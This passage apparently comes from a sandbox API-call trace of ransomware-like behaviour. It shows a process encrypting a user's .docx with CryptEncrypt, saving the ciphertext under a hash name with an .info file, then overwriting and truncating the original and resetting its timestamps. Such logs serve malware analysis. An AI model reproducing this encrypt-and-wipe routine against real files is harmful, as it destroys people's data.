halpmcxz\\documents\\fqqwpd4u\\d8d96e2e7400fa671e2de5900b4a63dc"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.594] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d318) returned 1 [0076.594] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", lpFilePart=0x0) returned 0x3f [0076.594] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", lpFilePart=0x0) returned 0x3f [0076.595] CryptImportKey (in: hProv=0x1a5b7d10, pbData=0x220a380, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d120 | out: phKey=0x1bf5d120*=0x1a626ec0) returned 1 [0076.595] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.595] CryptExportKey (in: hKey=0x1a626ec0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5d230 | out: pbData=0x0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.595] CryptExportKey (in: hKey=0x1a626ec0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x220a470, pdwDataLen=0x1bf5d230 | out: pbData=0x220a470*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.595] CryptImportKey (in: hProv=0x1a5b7d10, pbData=0x220a590, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d0f0 | out: phKey=0x1bf5d0f0*=0x1a626ad0) returned 1 [0076.595] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.595] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.595] CryptDuplicateKey (in: hKey=0x1a626ad0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d0e0 | out: phKey=0x1bf5d0e0*=0x1a626d70) returned 1 [0076.595] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.595] CryptSetKeyParam (hKey=0x1a626d70, dwParam=0x4, pbData=0x220a6d8*=0x1, dwFlags=0x0) returned 1 [0076.596] CryptSetKeyParam (hKey=0x1a626d70, dwParam=0x1, pbData=0x220a688, dwFlags=0x0) returned 1 [0076.596] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0076.596] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0076.596] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", lpFilePart=0x0) returned 0x3f [0076.596] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.596] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\wkzygxhhu.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.596] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E", lpFilePart=0x0) returned 0x51 [0076.596] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.596] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\5973faac59cde84af7aa4f5fa04afd8e"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a4 [0076.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.596] ReadFile (in: hFile=0x36c, lpBuffer=0x220aaa8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x220aaa8*, lpNumberOfBytesRead=0x1bf5d128*=0x6f47, lpOverlapped=0x0) returned 1 [0076.597] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x221eac0*, pdwDataLen=0x1bf5d180*=0x6f40, dwBufLen=0x6f40 | out: pbData=0x221eac0*, pdwDataLen=0x1bf5d180*=0x6f40) returned 1 [0076.599] ReadFile (in: hFile=0x36c, lpBuffer=0x220aaa8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x220aaa8*, lpNumberOfBytesRead=0x1bf5d128*=0x0, lpOverlapped=0x0) returned 1 [0076.599] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2225a40*, pdwDataLen=0x1bf5d0c0*=0x10, dwBufLen=0x10 | out: pbData=0x2225a40*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.599] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2225a90*, pdwDataLen=0x1bf5d0c0*=0x0, dwBufLen=0x10 | out: pbData=0x2225a90*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.599] CryptDestroyKey (hKey=0x1a626ec0) returned 1 [0076.599] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0076.599] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0076.599] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E", nBufferLength=0x105, lpBuffer=0x1bf5cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E", lpFilePart=0x0) returned 0x51 [0076.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d060) returned 1 [0076.599] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\5973faac59cde84af7aa4f5fa04afd8e"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfd0) returned 1 [0076.600] ReadFile (in: hFile=0x36c, lpBuffer=0x22271e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22271e8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.600] ReadFile (in: hFile=0x36c, lpBuffer=0x22271e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22271e8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.600] ReadFile (in: hFile=0x36c, lpBuffer=0x22271e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22271e8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.600] ReadFile (in: hFile=0x36c, lpBuffer=0x22271e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22271e8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.600] ReadFile (in: hFile=0x36c, lpBuffer=0x22271e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22271e8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.600] ReadFile (in: hFile=0x36c, lpBuffer=0x22271e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22271e8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.600] ReadFile (in: hFile=0x36c, lpBuffer=0x22271e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22271e8*, lpNumberOfBytesRead=0x1bf5d148*=0xf50, lpOverlapped=0x0) returned 1 [0076.600] ReadFile (in: hFile=0x36c, lpBuffer=0x22271e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22271e8*, lpNumberOfBytesRead=0x1bf5d148*=0x0, lpOverlapped=0x0) returned 1 [0076.602] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E.info", nBufferLength=0x105, lpBuffer=0x1bf5c900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E.info", lpFilePart=0x0) returned 0x56 [0076.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5cde0) returned 1 [0076.602] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\5973FAAC59CDE84AF7AA4F5FA04AFD8E.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\5973faac59cde84af7aa4f5fa04afd8e.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cd50) returned 1 [0076.607] WriteFile (in: hFile=0x36c, lpBuffer=0x22338c8*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5ceb8, lpOverlapped=0x0 | out: lpBuffer=0x22338c8*, lpNumberOfBytesWritten=0x1bf5ceb8*=0x77d, lpOverlapped=0x0) returned 1 [0076.609] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", lpFilePart=0x0) returned 0x3f [0076.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d170) returned 1 [0076.609] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\wkzygxhhu.docx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d250 | out: lpFileInformation=0x1bf5d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ed75dd0, ftCreationTime.dwHighDateTime=0x1d4cb2b, ftLastAccessTime.dwLowDateTime=0x8d844440, ftLastAccessTime.dwHighDateTime=0x1d4cdd9, ftLastWriteTime.dwLowDateTime=0x8d844440, ftLastWriteTime.dwHighDateTime=0x1d4cdd9, nFileSizeHigh=0x0, nFileSizeLow=0x6f47)) returned 1 [0076.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d130) returned 1 [0076.609] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", lpFilePart=0x0) returned 0x3f [0076.609] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", dwFileAttributes=0x80) returned 1 [0076.609] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", lpFilePart=0x0) returned 0x3f [0076.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1b0) returned 1 [0076.610] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\wkzygxhhu.docx"), fInfoLevelId=0x0, lpFileInformation=0x223b4d0 | out: lpFileInformation=0x223b4d0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1ed75dd0, ftCreationTime.dwHighDateTime=0x1d4cb2b, ftLastAccessTime.dwLowDateTime=0x8d844440, ftLastAccessTime.dwHighDateTime=0x1d4cdd9, ftLastWriteTime.dwLowDateTime=0x8d844440, ftLastWriteTime.dwHighDateTime=0x1d4cdd9, nFileSizeHigh=0x0, nFileSizeLow=0x6f47)) returned 1 [0076.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d170) returned 1 [0076.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", nBufferLength=0x105, lpBuffer=0x1bf5cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", lpFilePart=0x0) returned 0x3f [0076.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0a0) returned 1 [0076.610] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\wkzygxhhu.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.610] GetFileType (hFile=0x36c) returned 0x1 [0076.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d010) returned 1 [0076.610] GetFileType (hFile=0x36c) returned 0x1 [0076.610] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.611] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.612] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.613] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.614] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.614] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.615] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.616] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x1000, lpOverlapped=0x0) returned 1 [0076.616] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.617] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.617] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.618] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.619] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.620] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.620] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.621] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x1000, lpOverlapped=0x0) returned 1 [0076.621] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.622] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.623] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.623] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.624] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.625] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.625] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.626] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x1000, lpOverlapped=0x0) returned 1 [0076.626] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.631] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.631] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.632] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.633] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.634] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.634] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.635] WriteFile (in: hFile=0x36c, lpBuffer=0x223b978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x223b978*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x1000, lpOverlapped=0x0) returned 1 [0076.635] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.635] SetEndOfFile (hFile=0x36c) returned 1 [0076.636] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.636] CloseHandle (hObject=0x36c) returned 1 [0076.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", lpFilePart=0x0) returned 0x3f [0076.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.637] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\wkzygxhhu.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.637] GetFileType (hFile=0x36c) returned 0x1 [0076.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.637] GetFileType (hFile=0x36c) returned 0x1 [0076.637] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d278, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.637] CloseHandle (hObject=0x36c) returned 1 [0076.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx", lpFilePart=0x0) returned 0x3f [0076.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.637] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\wKzYgXHHu.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\wkzygxhhu.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.637] GetFileType (hFile=0x36c) returned 0x1 [0076.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.637] GetFileType (hFile=0x36c) returned 0x1 [0076.637] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d278, lpLastWriteTime=0x0) returned 